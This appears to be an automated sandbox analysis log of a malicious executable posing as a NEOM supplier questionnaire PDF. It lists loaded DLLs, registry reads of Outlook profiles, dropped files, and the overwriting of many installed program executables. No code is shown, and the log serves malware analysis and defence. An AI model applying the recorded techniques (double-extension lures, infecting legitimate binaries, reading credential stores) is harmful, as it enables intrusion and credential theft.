Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: webio.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: winhttp.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: netapi32.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: dsreg.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: msvcp110_win.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: msasn1.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: mpr.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: secur32.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: sspicli.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: ntmarta.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: edputil.dll
Source: C:\Windows\System32\alg.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static file information: File size 2777600 > 1048576
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x14de00
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Static PE information: section name: .reloc entropy: 7.931625250013023

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\52b8592e4ce608d8.bin
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Temp\neworigin.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Install\{3007B876-EF79-48CC-9A41-17D9D214FFC1}\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
